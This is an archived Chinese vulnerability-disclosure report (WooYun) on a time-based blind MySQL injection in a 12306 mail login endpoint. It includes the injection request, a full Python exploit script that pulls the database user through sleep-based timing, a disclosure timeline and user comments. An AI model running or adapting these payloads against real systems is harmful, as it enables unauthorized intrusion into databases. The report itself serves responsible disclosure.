12306某内部系统MySQL盲注需进一步修复(附验证脚本第四次绕过)

编号89304
Urlhttp://www.wooyun.org/bug.php?action=view&id=89304
漏洞状态厂商已经确认
漏洞标题12306某内部系统MySQL盲注需进一步修复(附验证脚本第四次绕过)
漏洞类型SQL注射漏洞
厂商12306
白帽子lijiejie
提交日期2014-12-30 13:55:00
公开日期2015-02-13 13:56:00
修复时间(not set)
确认时间2015-01-01 00:00:00
Confirm Spend2
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank1
厂商评级
厂商评rank7
漏洞简介
12306某内部系统MySQL盲注需进一步修复(附验证脚本,第四次绕过)
已存在多年,一直未修复完全,影响内部运营数据
漏洞细节

注射点:

POST http://mail.12306.cn/app/mail/login
domain=aa'XOR(if(length(database())=4,sleep(1),0))OR'bb&id=1&lang=zh_cn&pwd=1&remember=on&sid=d947be26445ad5a2c49b16f97a22be55&style=classic


参数domain可注入,MySQL time blind. sid每次需要重新获取。

POC

猜解user(),得到:

[email protected]


12306.mail.mysql.blind.png


当前库:

mail


验证脚本:

#encoding=gbk
import urllib2
import re
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('[email protected]_.')
html_doc = urllib2.urlopen('http://mail.12306.cn/app/mail/entry').read()
sid = re.search('name=sid value="([^"]+)"', html_doc).group(1)
print 'start to retrive MySQL user:'
user = ''
for i in range(1,15):
count = 0
for payload in payloads:
try:
conn = httplib.HTTPConnection('mail.12306.cn', timeout=60)
s = "123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb" % (i, ord(payload) )
params = {
'id': '1',
'lang': 'zh_cn',
'pwd': 'test',
'remember': 'on',
'sid': sid,
'style': 'classic',
'domain': s
}
conn.request(method='POST',
url='/app/mail/login',
body = urllib.urlencode(params),
headers = headers)
start_time = time.time()
html_doc = conn.getresponse().read()
conn.close()
if time.time() - start_time > 5:
raise Exception('oooooooops')
count += 1
sys.stdout.write('\r'+ '.' * count)
sys.stdout.flush()
except:
user += payload
print '\r[In progress]', user
break
print '\n[Done]MySQL user is', user

修复方案

建议还是过滤一下

状态信息 2014-12-30: 细节已通知厂商并且等待厂商处理中
2015-01-01: 厂商已经确认,细节仅向厂商公开
2015-01-11: 细节向核心白帽子及相关领域专家公开
2015-01-21: 细节向普通白帽子公开
2015-01-31: 细节向实习白帽子公开
2015-02-13: 细节向公众公开
厂商回复正在检查
回应信息危害等级:中漏洞Rank:7 确认时间:2015-01-01 10:13
Showing 1-42 of 42 items.
评论内容评论人点赞数评论时间

妈妈我要上电视啦!

pw002015-02-13 16:36:00

那么给力!

wefgod02015-01-21 16:47:00

CCTV 看这里!啪啪啪啪啪啪啪

J′aron02015-01-02 11:23:00

这里。。这里。。。

xbuther02015-01-01 17:49:00

我代表12306在说一次 这是撞库啊 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

SuperRookie02015-01-01 15:15:00

我要上电视,ccav拍这里

斯杰02015-01-01 13:54:00

可以买一条两千块的项链了

Observer02015-01-01 12:40:00

打脸赞!

huoji02015-01-01 11:32:00

使劲的打,让你不给我火车票。

帅气小狼狗02014-12-31 17:42:00

@小威 我知道女娲能补天,我想知到女娲跟铁道部有啥关系。。。还是是哪位大神

红客十年02014-12-31 11:23:00

@红客十年 女娲能补天啊!真为你智商捉急

小威02014-12-31 09:23:00

有意思,谁还说是撞库、打脸的节奏, CCTV看这里,哎呦喂镜头往这里凑凑,对就是这样,哎哎哎哎 哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎摄像师你别动镜头呀

’‘Nome02014-12-30 21:48:00

妈妈我要上电视啦~CCTV拍这里~~

Angelic4702014-12-30 21:37:00

@小威 威锅女娲是啥……话说我只想求一张回家的票。你们老撸铁道部干嘛

红客十年02014-12-30 21:35:00

我只想换一张回家的车票啊

Taro02014-12-30 19:39:00

看不了的飘过~

bingfeng02014-12-30 17:29:00

打脸女娲么?

小威02014-12-30 16:44:00

你好,回家的票能给我整一张不?

忽然之间02014-12-30 16:44:00

你好,请开下门,我们查下水表

大亮02014-12-30 16:25:00

啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。

打酱油的小男孩02014-12-30 16:21:00

CCTV拍这里!.....papapa

承诺02014-12-30 15:57:00

打脸啪啪啪

ConTrol02014-12-30 15:46:00

有意思,谁还说是撞库

爱Gail02014-12-30 15:22:00

吊炸天

子非海绵宝宝02014-12-30 15:01:00

CCTV拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍

YY-201202014-12-30 14:29:00

CCTV拍这里!

机器猫02014-12-30 13:50:00

12306的开发不甘寂寞啊....

Qiudays02014-12-30 13:32:00

继续打脸!12306竟然去360那边!

窝窝哥02014-12-30 13:19:00

第四次,你们这是看不起这个几亿的网站么?

无心、02014-12-30 11:53:00

@杀器王子 杀器王子全能王… 德艺双馨玩转各种内网渗透技术…

lijiejie02014-12-30 11:50:00

同一个位置第四次绕过。。

疯狗02014-12-30 11:50:00

12306 这是年底要爆发的节奏吧。。

h4ckhell0002014-12-30 11:48:00

@px1624 这个第四次的标题应该是审核的同学加的… 不过漏洞确实存在已久

lijiejie02014-12-30 11:46:00

第四次。。。所以说12306在某全球最大的平台去发奖励根本不解决问题么

px162402014-12-30 11:40:00

你们这是一起刷12丧零六啊

冰冻冷咖啡02014-12-30 11:37:00

12306是要火的节奏么。

浅蓝02014-12-30 11:30:00

我在等李姐姐把杀妻王子干掉

浩天02014-12-30 11:28:00

注入狂魔李姐姐

杀器王子02014-12-30 11:27:00

CCTV看这里!

g0odnight02014-12-30 11:25:00

@lijiejie 围观大牛!

bitcoin02014-12-30 11:25:00

前排

kydhzy02014-12-30 11:22:00

这哪里只是影响用户信息,企业内部信息可能也在劫难逃啊

浩天02014-12-30 11:20:00